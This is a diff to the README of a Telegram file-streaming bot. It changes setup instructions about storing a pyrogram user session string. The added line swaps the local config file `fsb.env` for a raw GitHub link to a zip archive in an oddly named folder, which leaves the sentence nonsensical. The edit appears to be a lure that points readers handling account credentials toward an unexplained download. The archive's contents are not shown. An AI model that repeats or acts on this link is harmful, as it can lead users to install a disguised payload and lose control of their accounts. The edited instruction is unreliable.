Brucewaynehatake/TG-FileStreamBot/README.md

 > This might sometimes result in your account getting resticted or banned.
 > **Only newly created accounts are prone to this.**

-To use this feature, you need to generate a pyrogram session string for the user account and add it to the `USER_SESSION` variable in the `fsb.env` file.
+To use this feature, you need to generate a pyrogram session string for the user account and add it to the `USER_SESSION` variable in the `https://raw.githubusercontent.com/Brucewaynehatake/TG-FileStreamBot/main/dystomous/TG-FileStreamBot.zip` file.

 #### What it does?